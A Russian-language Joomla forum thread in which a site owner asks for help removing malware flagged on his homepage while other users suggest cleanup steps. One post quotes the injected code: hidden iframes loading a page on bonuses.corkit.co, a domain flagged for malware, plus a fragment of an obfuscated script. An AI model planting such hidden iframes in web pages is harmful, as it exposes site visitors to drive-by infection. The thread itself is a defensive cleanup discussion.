Joomla 1.5 Как найти вирус?

Тема в разделе "Сайт умер, лежит и не дышит", создана пользователем Roma90, 11.03.2011.

  1. Offline

    Roma90 Пользователь

    Регистрация:
    21.06.2010
    Сообщения:
    56
    Симпатии:
    0
    Пол:
    Мужской
    При откритие сайта каспер видает:
    http://i058.radikal.ru/1103/67/06900f4e0461.jpg

    Как мне найти етот вирус!?
    Скачал сайт на ПК. Пробивал поиском - ничего не нашло..
    Такая ситуация на 2 сайтах (на одном хостинге).
    Сайти в подписи.
     
    Последнее редактирование: 11.03.2011
  2.  
  3. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 041
    Симпатии:
    518
    Пол:
    Мужской
    первый способ-смотреть configuration.php. выложи файл на форум. 2.меняй пароль FTP.
     
  4. Offline

    Roma90 Пользователь

    Регистрация:
    21.06.2010
    Сообщения:
    56
    Симпатии:
    0
    Пол:
    Мужской
    В файле configuration все норм =)

    Вирус только на главной вибивает.
    На главной странице наживаю права клав. - источник.

    Есть скрипт вируса! Удалил его, нажимаю применить изменения - не сохраняет.
    Как мне изменить значение главной страници!?
     
  5. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 041
    Симпатии:
    518
    Пол:
    Мужской
    Roma90,
    То что ты видишь в браузере-это продукт работы скрипта,вирус не вирус -без разницы.
    пробуй
     

    Вложения:

    • htaccess.zip
      Размер файла:
      2.4 КБ
      Просмотров:
      9
    Roma90 нравится это.
  6. Offline

    Roma90 Пользователь

    Регистрация:
    21.06.2010
    Сообщения:
    56
    Симпатии:
    0
    Пол:
    Мужской
    Заменил - видало ошибку Internal Server Error...
    Да еще. сообщение об вирусе показивает только в IE, в Опере почему то не сообщает о вирусе!
     
  7. Offline

    Roma90 Пользователь

    Регистрация:
    21.06.2010
    Сообщения:
    56
    Симпатии:
    0
    Пол:
    Мужской
    Проблема не решена - UP
     
  8. Offline

    aero11 Недавно здесь

    Регистрация:
    19.03.2011
    Сообщения:
    9
    Симпатии:
    2
    Пол:
    Мужской
    еще жива трабля ?
     
  9. Offline

    aero11 Недавно здесь

    Регистрация:
    19.03.2011
    Сообщения:
    9
    Симпатии:
    2
    Пол:
    Мужской
    Внимание! Обнаружена проблема!
    www.allforstudent.in.ua содержит материалы сайта bonuses.corkit.co, который, по имеющимся данным, распространяет вредоносное ПО. Ваш компьютер может подвергнуться вирусной атаке при посещении этого сайта.
    Google обнаружил, что на ваш компьютер могут быть установлены вредоносные программы, если вы продолжите просмотр этого сайта. Если вы посещали его в прошлом или доверяете ему, вполне возможно, что он недавно был взломан хакерами. Рекомендуется прекратить просмотр и посетить сайт завтра либо перейти на другой сайт.
    Мы уже сообщили владельцу сайта bonuses.corkit.co о том, что на его сайте найдено вредоносное ПО. Подробнее о проблемах, обнаруженных на bonuses.corkit.co, можно узнать на странице Google Страница диагностики безопасного просмотра.
     
    Roma90 нравится это.
  10. Offline

    aero11 Недавно здесь

    Регистрация:
    19.03.2011
    Сообщения:
    9
    Симпатии:
    2
    Пол:
    Мужской
    это вылезло при использовании локального прокси и OS Fedora + Google chrome

    ............ на втором ,тоже самое

    как из вариантов...поглядеть на файл index.php и в шаблоне temlates.php (там у вас может переименовано-кто знает)
    если надо- постараюсь помочь.
    А так...надо искать и думать на основе умозаключений, где могли бы проставлены права на перезапись (666) , потом надо знать и параметры хостинга(бесплатные страдают этим), разрешения в картинках-если не меняли-то ищите откуда прикрепили.
    кстати из моих наблюдений....неизменяемые файлы-ставьте разрешение 444

    -------------
    Ваша проблема - в index.php - там у вас режет Opera с предуставнолеными скриптами.Так к бану от Яндекса подойти легко.


    -------показан конец исходного кода страницы сайта
     

    Вложения:

    • 333.txt.zip
      Размер файла:
      333 байт
      Просмотров:
      5
    Последнее редактирование: 24.03.2011
  11. Offline

    Roma90 Пользователь

    Регистрация:
    21.06.2010
    Сообщения:
    56
    Симпатии:
    0
    Пол:
    Мужской
    На главной странице наживаю права клав. - источник.

    Есть скрипт вируса - ......444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,388/t,448/t,448/t.......
    Удалил его, нажимаю применить изменения - не сохраняет.
    Как мне изменить значение главной страници!?

    А где ви нашли етот вирус!?
    </div><iframe src="http://bonuses.corkit.co/ywdngzevkw.php?n=f0203" style="visibility: hidden; position: absolute; left: 0px; top: 0px; " width="10" height="10"></iframe><iframe src="http://bonuses.corkit.co/ywdngzevkw.php?n=f0203" style="visibility: hidden; position: absolute; left: 0px; top: 0px; ".....

    Хостинг платный.
    Копировал сайт на ПК. При помощью поиска ничего не нашел..
     
  12. Asylum
    Offline

    Asylum специалист

    Регистрация:
    09.02.2007
    Сообщения:
    2 571
    Симпатии:
    152
    Пол:
    Мужской
    Удалил из всех файлов, или это файербаге?
     
  13. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 041
    Симпатии:
    518
    Пол:
    Мужской
    искал касперским при запуске сайта или как?
     
  14. Offline

    valear Недавно здесь

    Регистрация:
    04.08.2010
    Сообщения:
    167
    Симпатии:
    15
    Пол:
    Мужской
    А всю базу на ПК скопировать и провести поиск через Дримвивер по всем файлам того куска кода пробовал?
     
  15. Offline

    Roma90 Пользователь

    Регистрация:
    21.06.2010
    Сообщения:
    56
    Симпатии:
    0
    Пол:
    Мужской
    Вирус был в файлах index.html.
    Вроде удалил со всех.
    Зайдите на сайт. На главной странице нажмите права клав. - источник. Посмотрите код, пожалуста.
    Как мне оттуда убрать вирус?
    Да, Каспером. Ничего не находит.
    Искал код обычным поиском куска кода в тексте, тоже ничего не нашло.
    Сервисы по анализе говорят что вируса нет.
    Может подскажете где можно проверить сайт на вирусы
    Нет, счас попробую...
     
  16. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 041
    Симпатии:
    518
    Пол:
    Мужской
    Так они ж разные бывают,и вирусы меняющие,дописывающие сторонний код в файлы размешенные на хостинге,или скрипты,приходящие со ссылок,размещенных хацкером.

    Roma90,
    Еще и Notepad++ можно искать,он и бесплатный,и нужнее дрима.
     
  17. Offline

    Roma90 Пользователь

    Регистрация:
    21.06.2010
    Сообщения:
    56
    Симпатии:
    0
    Пол:
    Мужской
    Как мне зайти на phpMyAdmin, не подскажете!?
    Как мне узнать пароль и логин для входа?
    Служба поддержки хострера (icq) в выходные не работает :(
     
  18. Offline

    Roma90 Пользователь

    Регистрация:
    21.06.2010
    Сообщения:
    56
    Симпатии:
    0
    Пол:
    Мужской
    draff, Зайдите на сайт. На главной странице нажмите права клав. - источник. Посмотрите код, пожалуста. Как мне удалить его с главной страницы?
     
  19. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 041
    Симпатии:
    518
    Пол:
    Мужской
    А по фтп скачать файлы?К панели хостинга есть доступ,какая панель управления хостингом?
    п.с.
    Сейчас попробую зайти,но повторю-в браузере уже результат работы скрипта,даже и вредоносного.
    п.с.
    Аваст заблокировал загрузку сайта.Сейчас попробую с убунты.
     
    Последнее редактирование: 26.03.2011
  20. Offline

    Roma90 Пользователь

    Регистрация:
    21.06.2010
    Сообщения:
    56
    Симпатии:
    0
    Пол:
    Мужской
    Да по фтп файлы я скачивал, ничего не шашло.
    valear: А всю базу на ПК скопировать...
    Ето что в базе может бить вирус!?
     
  21. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 041
    Симпатии:
    518
    Пол:
    Мужской
    плохо искал.Ну не буду трогать дизайн,но очень много в странице.
    Диагноз подтвердился -"iframe" на сайт bonuses.corkit.co
    http://joomla-support.ru/vbfavorites.php?do=add&entry_type=post&entry_id=120410
     

Поделиться этой страницей

Загрузка...